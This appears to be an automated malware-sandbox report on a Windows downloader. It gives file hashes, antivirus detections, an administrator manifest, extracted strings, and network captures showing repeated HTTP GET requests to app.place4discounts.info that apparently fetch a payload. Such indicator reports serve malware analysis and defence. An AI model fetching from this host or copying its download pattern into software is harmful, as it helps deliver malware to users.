Analysis Date2014-03-27 01:47:33
MD5a188098f3b585627659348945e4d6a53
SHA1a2c2fa83e17f5f6ca2156fbf2a4a7c996ab3912a

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: c4030fd373f20bfd1b4c6ac651a435e9 sha1: 2d5cf993f49fa358331352fa8fb20b73d18b0200 size: 158208
Section.rdata md5: 60b7808bbdf164cdcac782b27a88e66a sha1: fcec018ff31234290549add9f5a7bf60da7c2db4 size: 44544
Section.data md5: 158c31c56c07bc1494cfd94bf341ddcb sha1: 24ad9ebcfef3cce235009896d6469ab7c68d6e5d size: 14848
Section.rsrc md5: 2562efe9927e035a04cce7f7c1d86c2e sha1: 86a5cbea2a9b5ccaffefcaa791415d1c81f7413f size: 26624
Section.reloc md5: 45d80a40647e5efb4d4a2306086d8002 sha1: 99d0a97eceeed5a4f6179b51ba52feee41b684b1 size: 34816
Timestamp2014-03-16 14:31:06
Pdb pathC:\dev\shite-installer\bin\release\shite.pdb
PackerMicrosoft Visual C++ ?.?
PEhashdb74bcc9d546916bbb3f1dadb0781bac729302d4
IMPhash2962725084f281a0268334b930e517f9
AVmcafeeRDN/Downloader.a!pm
AVavgDownloader.Agent2.BTMO

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File\Device\Afd\Endpoint
Creates MutexDBWinMutex
Winsock DNSapp.place4discounts.info

Network Details:

DNSapp.place4discounts.info
Type: A
173.245.60.73
DNSapp.place4discounts.info
Type: A
173.245.61.73
HTTP GEThttp://app.place4discounts.info/4/tmps.g23
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
HTTP GEThttp://app.place4discounts.info/4/tmps.g23
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
HTTP GEThttp://app.place4discounts.info/4/tmps.g23
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 173.245.60.73:80
Flows TCP192.168.1.1:1032 ➝ 173.245.60.73:80
Flows TCP192.168.1.1:1033 ➝ 173.245.60.73:80

Raw Pcap
0x00000000 (00000)   47455420 2f342f74 6d70732e 67323320   GET /4/tmps.g23 
0x00000010 (00016)   48545450 2f312e31 0d0a486f 73743a20   HTTP/1.1..Host: 
0x00000020 (00032)   6170702e 706c6163 65346469 73636f75   app.place4discou
0x00000030 (00048)   6e74732e 696e666f 0d0a436f 6e6e6563   nts.info..Connec
0x00000040 (00064)   74696f6e 3a20636c 6f73650d 0a557365   tion: close..Use
0x00000050 (00080)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000060 (00096)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000070 (00112)   3b204d53 49452037 2e303b20 57696e64   ; MSIE 7.0; Wind
0x00000080 (00128)   6f777320 4e542035 2e31290d 0a0d0a     ows NT 5.1)....

0x00000000 (00000)   47455420 2f342f74 6d70732e 67323320   GET /4/tmps.g23 
0x00000010 (00016)   48545450 2f312e31 0d0a486f 73743a20   HTTP/1.1..Host: 
0x00000020 (00032)   6170702e 706c6163 65346469 73636f75   app.place4discou
0x00000030 (00048)   6e74732e 696e666f 0d0a436f 6e6e6563   nts.info..Connec
0x00000040 (00064)   74696f6e 3a20636c 6f73650d 0a557365   tion: close..Use
0x00000050 (00080)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000060 (00096)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000070 (00112)   3b204d53 49452037 2e303b20 57696e64   ; MSIE 7.0; Wind
0x00000080 (00128)   6f777320 4e542035 2e31290d 0a0d0a     ows NT 5.1)....

0x00000000 (00000)   47455420 2f342f74 6d70732e 67323320   GET /4/tmps.g23 
0x00000010 (00016)   48545450 2f312e31 0d0a486f 73743a20   HTTP/1.1..Host: 
0x00000020 (00032)   6170702e 706c6163 65346469 73636f75   app.place4discou
0x00000030 (00048)   6e74732e 696e666f 0d0a436f 6e6e6563   nts.info..Connec
0x00000040 (00064)   74696f6e 3a20636c 6f73650d 0a557365   tion: close..Use
0x00000050 (00080)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000060 (00096)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000070 (00112)   3b204d53 49452037 2e303b20 57696e64   ; MSIE 7.0; Wind
0x00000080 (00128)   6f777320 4e542035 2e31290d 0a0d0a     ows NT 5.1)....


Strings
.
.
  
00-+ 00-+ .
 
-
-1
+-0-E-
-0
0
0- 
000
u.
n
- abort() has been called
af-za
af-ZA
ALC_ALL
america
american
american english
american-english
April
ar-ae
ar-AE
ar-bh
ar-BH
ar-dz
ar-DZ
ar-eg
ar-EG
ar-iq
ar-IQ
ar-jo
ar-JO
ar-kw
ar-KW
ar-lb
ar-LB
ar-ly
ar-LY
ar-ma
ar-MA
ar-om
ar-OM
ar-qa
ar-QA
ar-sa
ar-SA
ar-sy
ar-SY
ar-tn
ar-TN
ar-ye
ar-YE
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
australian
az-az-cyrl
az-AZ-Cyrl
az-az-latn
az-AZ-Latn
BCHN
BCHS
BCHT
BCZE
BDEA
BDEC
BDEL
BDES
be-by
be-BY
belgian
BENA
BENB
BENC
BENG
BENI
BENJ
BENL
BENS
BENT
BENU
BENZ
BESA
BESB
BESC
BESD
BESE
BESF
BESG
BESH
BESI
BESL
BESM
BESN
BESO
BESR
BESS
BESU
BESV
BESY
BESZ
BFRB
BFRC
BFRL
BFRS
bg-bg
bg-BG
BGBR
BHKG
BITS
Bja-JP
BKOR
bn-in
bn-IN
BNLB
BNLD
BNON
BNOR
BNZL
BPRI
BPTB
BR6002
britain
bs-ba-latn
bs-BA-Latn
BSVF
BSVK
BTTO
BUSA
BZAF
BZHH
BZHI
ca-es
ca-ES
canadian
china
chinese
chinese-hongkong
chinese-simplified
chinese-singapore
chinese-traditional
CONOUT$
- CRT not initialized
cs-cz
cs-CZ
cy-gb
cy-GB
czech
da-dk
da-DK
dddd, MMMM dd, yyyy
de-at
de-AT
December
de-ch
de-CH
de-de
de-DE
de-li
de-LI
de-lu
de-LU
div-mv
div-MV
DOMAIN error
dutch-belgian
el-gr
el-GR
en-au
en-AU
en-bz
en-BZ
en-ca
en-CA
en-cb
en-CB
en-gb
en-GB
england
english-american
english-aus
english-belize
english-can
english-caribbean
english-ire
english-jamaica
english-nz
english-south africa
english-trinidad y tobago
english-uk
english-us
english-usa
en-ie
en-IE
en-jm
en-JM
en-nz
en-NZ
en-ph
en-PH
en-tt
en-TT
en-us
en-US
en-za
en-ZA
en-zw
en-ZW
es-ar
es-AR
es-bo
es-BO
es-cl
es-CL
es-co
es-CO
es-cr
es-CR
es-do
es-DO
es-ec
es-EC
es-es
es-ES
es-gt
es-GT
es-hn
es-HN
es-mx
es-MX
es-ni
es-NI
es-pa
es-PA
es-pe
es-PE
es-pr
es-PR
es-py
es-PY
es-sv
es-SV
es-uy
es-UY
es-ve
es-VE
et-ee
et-EE
eu-es
eu-ES
fa-ir
fa-IR
February
fi-fi
fi-FI
- floating point support not loaded
fo-fo
fo-FO
fr-be
fr-BE
fr-ca
fr-CA
fr-ch
fr-CH
french-belgian
french-canadian
french-luxembourg
french-swiss
fr-fr
fr-FR
Friday
fr-lu
fr-LU
fr-mc
fr-MC
german-austrian
german-lichtenstein
german-luxembourg
german-swiss
gl-es
gl-ES
great britain
gSplashWindow
gu-in
gu-IN
                                 H
         (((((                  H
he-il
he-IL
         h((((                  H
HH:mm:ss
hi-in
hi-IN
holland
hong-kong
hr-ba
hr-BA
hr-hr
hr-HR
hu-hu
hu-HU
hy-am
hy-AM
IDI_APP_ICON
id-id
id-ID
- inconsistent onexit begin-end variables
irish-english
is-is
is-IS
italian-swiss
it-ch
it-CH
it-it
it-IT
ja-jp
January
jjjjh
jjjjj
July
June
ka-ge
ka-GE
kernel32.dll
kk-kz
kk-KZ
kn-in
kn-IN
kok-in
kok-IN
ko-kr
ko-KR
ky-kg
ky-KG
LC_COLLATE
LC_CTYPE
LC_MONETARY
LC_NUMERIC
LC_TIME
lt-lt
lt-LT
lv-lv
lv-LV
March
Microsoft Visual C++ Runtime Library
mi-nz
mi-NZ
mk-mk
mk-MK
ml-in
ml-IN
MM/dd/yy
mn-mn
mn-MN
Monday
mr-in
mr-IN
ms-bn
ms-BN
mscoree.dll
ms-my
ms-MY
mt-mt
mt-MT
nb-no
nb-NO
new-zealand
nl-be
nl-BE
nl-nl
nl-NL
nn-no
nn-NO
norwegian
norwegian-bokmal
norwegian-nynorsk
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
ns-za
ns-ZA
(null)
October
pa-in
pa-IN
pl-pl
pl-PL
portuguese-brazilian
pr china
pr-china
Program: 
<program name unknown>
pt-br
pt-BR
pt-pt
pt-PT
puerto-rico
- pure virtual function call
quz-bo
quz-BO
quz-ec
quz-EC
quz-pe
quz-PE
R6008
R6009
R6010
R6016
R6017
R6018
R6019
R6024
R6025
R6026
R6027
R6028
R6030
R6031
R6032
R6033
R6034
ro-ro
ro-RO
runtime error 
Runtime Error!
ru-ru
ru-RU
sa-in
sa-IN
Saturday
se-fi
se-FI
se-no
se-NO
September
se-se
se-SE
SING error
sk-sk
sk-SK
slovak
sl-si
sl-SI
sma-no
sma-NO
sma-se
sma-SE
smj-no
smj-NO
smj-se
smj-SE
smn-fi
smn-FI
sms-fi
sms-FI
south africa
south-africa
south korea
south-korea
spanish-argentina
spanish-bolivia
spanish-chile
spanish-colombia
spanish-costa rica
spanish-dominican republic
spanish-ecuador
spanish-el salvador
spanish-guatemala
spanish-honduras
spanish-mexican
spanish-modern
spanish-nicaragua
spanish-panama
spanish-paraguay
spanish-peru
spanish-puerto rico
spanish-uruguay
spanish-venezuela
sq-al
sq-AL
sr-ba-cyrl
sr-BA-Cyrl
sr-ba-latn
sr-BA-Latn
sr-sp-cyrl
sr-SP-Cyrl
sr-sp-latn
sr-SP-Latn
Sunday
sv-fi
sv-FI
sv-se
sv-SE
swedish-finland
swiss
sw-ke
sw-KE
syr-sy
syr-SY
ta-in
ta-IN
te-in
te-IN
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
th-th
th-TH
Thursday
TLOSS error
tn-za
tn-ZA
trinidad & tobago
tr-tr
tr-TR
tt-ru
tt-RU
Tuesday
uk-ua
uk-UA
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
united-kingdom
united-states
ur-pk
ur-PK
USER32.DLL
uz-uz-cyrl
uz-UZ-Cyrl
uz-uz-latn
uz-UZ-Latn
vi-vn
vi-VN
Wednesday
xh-za
xh-ZA
zh-chs
zh-CHS
zh-cht
zh-CHT
zh-cn
zh-CN
zh-hk
zh-HK
zh-mo
zh-MO
zh-sg
zh-SG
zh-tw
zh-TW
zu-za
zu-ZA
                          
()$^.*+?[]|\-{},:=!
#*///////-%
																			
																									
																												
0 0@0`0|0
0 0(00080@0H0P0X0`0h0p0x0
0,0@0P0`0l0
0!0*0u0z0
0'030z0
0!070M0c0y0
010H0W0
0123456789abcdefABCDEF
0123456789abcdefghijklmnopqrstuvwxyz
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
? ?$?(?,?0?4?8?
>#>+>0>4>8>a>
; ;$;(;,;0;4;8;<;@;L;P;T;X;\;`;d;h;l;p;t;x;|;
;(;,;0;4;<;@;T;d;t;x;
>$>(>0>8>@>H>P>X>`>h>p>x>
? ?(?0?8?@?H?P?X?`?h?p?x?
=$=0=8=l=|=
0A0H0L0P0T0X0\0`0d0
0D1N1k1u1
: :(:0:<:\:h:
> >$>(>0>H>X>h>x>|>
<0|o<9
1*101_1z1
1 1(10181@1H1P1X1`1h1p1x1
1 1$1(1,1014181<1@1D1H1L1P1T1X1\1
1!111A1a1|1
1&1,171=1L1U1^1j1w1
1)1?1U1k1
1)131Y1
1#151G1Y1
1"1A1W1a1g1r1
1(1H1P1X1d1
1(1H1T1p1|1
1&2+22292@2G2N2U2\2c2j2q2x2
1"292o2
1&2O2b2r2
140217165020Z
1B3F3J3N3R3V3Z3^3
1L2^2p2~7
1#QNAN
1#SNAN
1x3I5w6
212G2]2s2
2,202L2P2l2p2
2 2(20282@2H2P2X2`2h2p2x2
2 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2
2!2%2)2-2125292=2A2E2I2M2
222<2t2|2
2$2,242<2D2L2T2\2d2l2t2|2
2 2,282D2P2\2h2t2
2"3-3P3[3w3
2<3R3h3~3
:$:*:2:7:=:E:J:P:X:]:c:k:p:v:~:
282@2H2T2t2
;2;A;b;
2fhNoW
2h2l2p2
2}}iWvcGGGGGGGGGGmmo0
:';2;?;J;U;];
2l;t;|;
?"?*?3?<?\?
30383L3T3\3d3h3l3t3
303C3V3i3|3
3 3(30383@3H3P3X3`3h3p3x3
 3$3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3d4
3 3$3(3,3034383<3@3D3
3'3?3K3Z3
3%363B3I3R3k3u3
3)3Q3q3
3&4R4^4q4
383@3H3P3l3p3
391231235959Z0
3A3G3]3d3j3o3}3
}:4-***/////13&;Td
4 4(40484@4H4P4X4`4h4p4x4
4&4,42484
4!4'464=4M4S4Y4a4g4m4u4{4
4 4,484
4'4:4P4`4s4
4%4,4x4
44585H5L5\5`5d5l5
4>4Y4r4
4$5<5l5
4	575Z5
= =4=8=P=`=d=|=
4A5Y5r5
;!;);.;4;<;A;G;O;T;Z;b;g;m;u;z;
? ?&?/?4?C?J?q?
<4<D<H<L<P<X<\<p<t<
<$<,<4<<<D<L<T<\<d<l<t<|<
=$=,=4=<=D=L=T=\=d=l=t=|=
;$;,;4;<;D;L;T;\;d;l;t;|;
:$:,:4:<:D:L:T:\:d:l:t:|:
;$<4<D<T<d<
=4=g=v=}=
4H4h4p4t4
;$;,;4;<;H;h;t;
>4>@>`>h>t>|>
4I4Y4m4
4K5a5w5
<4=R>z>
? ?(?4?T?\?h?
515D5Z5p5
5 5(50585@5
5$5,545<5D5L5T5\5d5l5t5|5
5%5-5H5S5
5,5>5P5b5
5 5L5P5X5`5h5l5t5
5%6-636B6v6
575@5_5j5t5
596i6o6
;5;B;G;U;
5C5[5`6
6!:%:):-:1:5:9:=:A:E:I:M:[:
636I6_6u6
6$6,646<6D6L6T6\6d6l6t6|6
6(6,6<6@6D6L6d6t6x6
6$6,6@6H6L6X6`6
6 666L6b6x6
6(6H6S6
6-6L6c6r6
66/q%k
6)727@7a7~7
<6=;=a=
6|Q l'
6S]^X=$
757K7a7
757K7a7w7
767P7]7
7(747@7L7X7d7p7|7
7(7,70747<7T7d7h7x7|7
7$7,747<7D7L7T7\7d7l7t7|7
7$7(74787D7H7P7T7\7`7h7l7t7x7
7$7(7p7
7.7J7R7W7{7
7<8G829f9
7'8P8]8c8
7 8S8{8
79:C:M:
7f9m9~9
< =7=l=
7L7V7^7f7n7L;W;e;
:!:7:M:c:y:
80E0~0
81868U8
82:5;;>
858K8a8w8
85:S:l:s:{:
8,8084888L8P8T8l8p8
8(80888@8L8l8x8
8$808<8H8T8`8l8x8
[$8>80EJJ-
8$8,848<8D8L8T8\8d8l8t8|8
8 8$8(8,80848
8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
8"8.8:8F8P8\8h8r8
8'8=8S8i8
88N[NAA=XG
8 9&9,92989>9E9L9S9Z9a9h9o9w9
8+9@9g9
8<9n9}9
8A9W9c9i9
]8>AC=HJP.
8I:R<c<w<}<
8\u,@;
8\u.@;
<&<.<9<
9%:+:1:7:=:C:J:Q:X:_:f:m:t:|:
9!939L9R9m9}9
9$9,949<9D9L9
9$9,949<9D9L9T9\9d9l9t9|9
9 9,989D9P9\9h9t9
9@9`9|9
9 9(9,90989P9`9p9
9/9E9[9q9
99:l:M=s>}>
9@9P9\9|9
9f;o<{<
9\u(A;
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
address family not supported
address_family_not_supported
address in use
address_in_use
address not available
address_not_available
already connected
already_connected
:A<o<v<(=,=0=4=8=<=@=D=H=L=z>"?
    </application>
		<application>
argument list too long
argument out of domain
</assembly>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
`=>ASSNOX:
.?AUctype_base@std@@
August
.?AVbad_alloc@std@@
.?AVbad_cast@std@@
.?AVbad_exception@std@@
.?AV?$collate@D@std@@
.?AV?$ctype@D@std@@
.?AVerror_category@std@@
.?AVexception@std@@
.?AV_Facet_base@std@@
.?AVfacet@locale@std@@
.?AV_Generic_error_category@std@@
.?AV_Iostream_error_category@std@@
.?AVlength_error@std@@
.?AV_Locimp@locale@std@@
.?AVlogic_error@std@@
.?AV_Node_assert@std@@
.?AV_Node_back@std@@
.?AV_Node_base@std@@
.?AV_Node_capture@std@@
.?AV?$_Node_class@DV?$regex_traits@D@std@@@std@@
.?AV_Node_end_group@std@@
.?AV_Node_endif@std@@
.?AV_Node_end_rep@std@@
.?AV_Node_if@std@@
.?AV_Node_rep@std@@
.?AV?$_Node_str@D@std@@
.?AVout_of_range@std@@
.?AVregex_error@std@@
.?AV_Root_node@std@@
.?AVruntime_error@std@@
.?AV_System_error_category@std@@
.?AVtype_info@@
**////*B
B 02CV
bad address
bad_address
bad allocation
bad cast
bad exception
bad file descriptor
bad_file_descriptor
bad locale name
bad message
 Base Class Array'
 Base Class Descriptor at (
__based(
;b;h;l;p;t;
broken pipe
#*BWFd
<,<B<X<n<
C =02CVu
c"BJ K
*cc@WGGGGGGGGGF@,	
__cdecl
C:\dev\shite-installer\bin\release\shite.pdb
	C-Install0
C-Install CA
C-Install CA0
 Class Hierarchy Descriptor'
CloseHandle
CloseThreadpoolTimer
CloseThreadpoolWait
__clrcall
:!=C?M?X?
CompareStringEx
CompareStringW
	</compatibility>
	<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
 Complete Object Locator'
connection aborted
connection_aborted
connection already in progress
connection_already_in_progress
connection refused
connection_refused
connection reset
connection_reset
`copy constructor closure'
Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
CorExitProcess
CreateBitmap
CreateCompatibleDC
CreateFileMappingW
CreateFileW
CreateSemaphoreExW
CreateSymbolicLinkW
CreateThreadpoolTimer
CreateThreadpoolWait
CreateWindowExW
cross device link
Ct$\9L$l
>Cu/f9F
czI1Bh
@.data
?$?D?d?
dddd, MMMM dd, yyyy
D$d+D$\j
December
`default constructor closure'
DefWindowProcW
 delete
 delete[]
DeleteCriticalSection
DeleteDC
DeleteFileW
  <description>Setup</description>
destination address required
destination_address_required
DestroyWindow
device or resource busy
D$<hHJC
<@>D>H>L>P>T>X>\>`>d>p>x>|>
directory not empty
DispatchMessageW
D$l+D$d+D$ 
: :$:,:D:T:X:h:l:
`dynamic atexit destructor for '
`dynamic initializer for '
<.=D=Z=p=
__eabi
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
EnterCriticalSection
EnumSystemLocalesEx
EnumSystemLocalesW
?/?E?[?q?
executable format error
ExitProcess
__fastcall
f;CFsq
February
FH<.tN<[tJ<\tF<*tB<|t><^t:<$t6
FH<(t'<)t#<+t
FH<_u`
file exists
filename too long
filename_too_long
file too large
>F?L?R?c?n?t?
;!;/;@;F;L;S;a;
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FlushFileBuffers
FlushProcessWriteBuffers
<F<p<t<x<|<
FreeEnvironmentStringsW
FreeLibrary
FreeLibraryWhenCallbackReturns
Friday
function not supported
:%:+:g:
G0J2T2^2
G0Pj.S
G4Pj/S
G8PjDS
GDI32.dll
GDPjGS
GdPjOS
generic
Genuu_
GetACP
GetActiveWindow
GetCommandLineW
GetConsoleCP
GetConsoleMode
GetCPInfo
GetCurrentPackageId
GetCurrentProcess
GetCurrentProcessId
GetCurrentProcessorNumber
GetCurrentThreadId
GetDateFormatEx
GetDesktopWindow
GetEnvironmentStringsW
GetFileSize
GetFileType
GetFullPathNameW
GetLastActivePopup
GetLastError
GetLocaleInfoEx
GetLocaleInfoW
GetLogicalProcessorInformation
GetModuleFileNameW
GetModuleHandleA
GetModuleHandleExW
GetModuleHandleW
GetMonitorInfoW
GetObjectW
GetOEMCP
GetProcAddress
GetProcessHeap
GetProcessWindowStation
GetStartupInfoW
GetStdHandle
GetStringTypeW
GetSystemTimeAsFileTime
GetTempPathA
GetTickCount
GetTimeFormatEx
GetUserDefaultLCID
GetUserDefaultLocaleName
GetUserObjectInformationW
GetVersionExW
GetWindowRect
<^<@GFD; 
GhPj8S
GHPjHS
GlPj9S
GLPjIS
G<PjES
G@PjFS
G\PjMS
G`PjNS
G|Pj=S
G Pj*S
G,Pj-S
G(Pj,S
G$Pj+S
GPPjJS
GpPj:S
GTPjKS
GtPj;S
GXPjLS
GxPj<S
`h````
HeapAlloc
HeapFree
HeapReAlloc
HeapSize
`h`hhh
HH:mm:ss
HHtVHHt
hlmmmm
hmmmmmmmmm
host unreachable
host_unreachable
Ht+Ht$Ht
^http[s]?://([^\/:\s]+)(:[^\/\s]+)?(\/?[^\s]*)$
_hypot
identifier removed
)iiWWmGGGGGGGGGGGFD9
illegal byte sequence
inappropriate io control operation
ineIuV
InitializeCriticalSectionAndSpinCount
InitializeCriticalSectionEx
InterlockedCompareExchange
InterlockedDecrement
InterlockedIncrement
interrupted
invalid argument
invalid_argument
invalid map/set<T> iterator
invalid seek
invalid string position
io error
iostream
iostream stream error
is a directory
IsDebuggerPresent
IsProcessorFeaturePresent
IsValidCodePage
IsValidLocale
IsValidLocaleName
iWvdGGGGGGGGGmooo0
iWvvDGGGGGGmmooot0
jA[jZZ+
JanFebMarAprMayJunJulAugSepOctNovDec
January
jAZjZ^+
j"_f9y
j@j _W
jmmmmmmm
>j?o?x?
="=j=o=y=
KERNEL32.dll
;&;,;K;Q;
?K?T?|?
LCMapStringEx
LCMapStringW
LeaveCriticalSection
L$HQPf
L$<;L$
lmmmmmmmmmmm
lmmmmmmmmmmmmmmm
LoadCursorW
LoadLibraryA
LoadLibraryExW
LoadLibraryW
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
< <,<L<T<\<d<p<
lUeu9-
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
map/set<T> too long
MapViewOfFile
MessageBoxW
message size
message_size
MM/dd/yy
mmmlljhW
mmmmmmmljh]F
mmmmmmmmmmmljhWF
mmmmmmmmmmmmm
mmmmmmmmmmmmmlljdI
mmmmmmmmmmmmmmmmmljh]B
mmmmmmmmmmmmmmmmmm
mmmmmmmmmmmmmmmmmmm
mmmmmmmmmmmmmmmmmmmmml
mmmmmmmmmmmmmmmmmmmmmm
Monday
MonitorFromPoint
MultiByteToWideChar
network down
network_down
network reset
network_reset
network unreachable
network_unreachable
 new[]
_nextafter
no buffer space
no_buffer_space
no child process
no link
no lock available
no message
no message available
no protocol option
no_protocol_option
no space on device
no stream resources
no such device
no such device or address
no such file or directory
no such process
not a directory
not a socket
not_a_socket
not a stream
not connected
not_connected
not enough memory
not supported
November
nteluM3
(null)
October
`omni callsig'
operation canceled
operation in progress
operation_in_progress
operation not permitted
operation not supported
operation_not_supported
operation would block
operation_would_block
operator
OutputDebugStringA
OutputDebugStringW
owner dead
__pascal
PeekMessageW
permission denied
permission_denied
~pjCXf
`placement delete closure'
`placement delete[] closure'
PP9E u
PPPPPPPP
protocol error
protocol not supported
protocol_not_supported
__ptr64
;/<P<U<
=?>P>W>e>|>
qIqm_'
QQSVWd
QQSVWh
QueryPerformanceCounter
=%=;=Q=Y=
RaiseException
`.rdata
read only file system
regex_error
regex_error(error_backref): The expression contained an invalid back reference.
regex_error(error_badbrace): The expression contained an invalid range in a { expression }.
regex_error(error_badrepeat): One of *?+{ was not preceded by a valid regular expression.
regex_error(error_brace): The expression contained mismatched { and }.
regex_error(error_brack): The expression contained mismatched [ and ].
regex_error(error_collate): The expression contained an invalid collating element name.
regex_error(error_complexity): The complexity of an attempted match against a regular expression exceeded a pre-set level.
regex_error(error_ctype): The expression contained an invalid character class name.
regex_error(error_escape): The expression contained an invalid escaped character, or a trailing escape.
regex_error(error_paren): The expression contained mismatched ( and ).
regex_error(error_parse)
regex_error(error_range): The expression contained an invalid character range, such as [b-a] in most encodings.
regex_error(error_space): There was insufficient memory to convert the expression into a finite state machine.
regex_error(error_stack): There was insufficient memory to determine whether the regular expression could match the specified character sequence.
regex_error(error_syntax)
RegisterClassW
ReleaseDC
@.reloc
				<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
			</requestedPrivileges>
			<requestedPrivileges>
resource deadlock would occur
resource unavailable try again
__restrict
restrict(
result out of range
)rr^WiGGGGGGGGGGGGGG'
RSDS0C
RtlUnwind
RVSQSWV
rWvv^FGGGGmooott
=&?,?R?X?w?}?
Saturday
`scalar deleting destructor'
		</security>
		<security>
SelectObject
September
SetDefaultDllDirectories
SetFilePointerEx
SetLastError
SetStdHandle
SetThreadpoolTimer
SetThreadpoolWait
SetThreadStackGuarantee
SetTimer
SetUnhandledExceptionFilter
ShowWindow
state not recoverable
__stdcall
stream timeout
`string'
string too long
Sunday
SunMonTueWedThuFriSat
      <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
      <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
SVjA[jZ^+
,SVWj0X
SVWjA_jZ+
system
~';_t|%3
t6h`4C
_tcPVj@
TerminateProcess
text file busy
tf=x>C
**/////-%&<Th
+t"HHt
__thiscall
!This program cannot be run in DOS mode.
Thursday
timed out
timed_out
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
tO95TtC
too many files open
too_many_files_open
too many files open in system
too many links
too many symbolic link levels
TranslateMessage
	</trustInfo>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
Tuesday
;t$,v-
t VV9u
 Type Descriptor'
`typeof'
tyPVj@W
U$22"+0EH'
uBjAYjZ+
`udt returning'
uHjAXf;
u#j,Xf;
__unaligned
UnhandledExceptionFilter
UNICODE
unknown error
Unknown exception
UnmapViewOfFile
UpdateLayeredWindow
UpdateWindow
uPVWh.
UQPXY]Y[
URPQQh
USER32.dll
UTF-16LE
uZ9FTtUV
value too large
`vbase destructor'
`vbtable'
VC20XC00U
`vcall'
vector<bool> too long
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
vector<T> too long
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`vftable'
VirtualAlloc
`virtual displacement map'
VirtualFree
VirtualProtect
VirtualQuery
=V>[>m>
v	N+D$
w(_^[]
WaitForSingleObject
WaitForThreadpoolTimerCallbacks
WAU`]Q
Wednesday
<^^@WGGGGGFD9
WideCharToMultiByte
Wj0XPV
WriteConsoleW
WriteFile
wrong protocol type
wrong_protocol_type
wsprintfW
)}}^WvGGGGGGGGGGGGGm0
}WvvvDGGmooott
Wvvv^^mooott
Wvvvv^mott
wwwwwwp
wwwwwwwwp
wwwwwwwx
wwwwwwx
wwwwwx
wwwwxp
wxwwwww
xdigit
	XhUq^pCb7
xppwpp
xpxxxx
Yt&\4'
Yu2Vj@h
Z"QWhd
zR>}\jw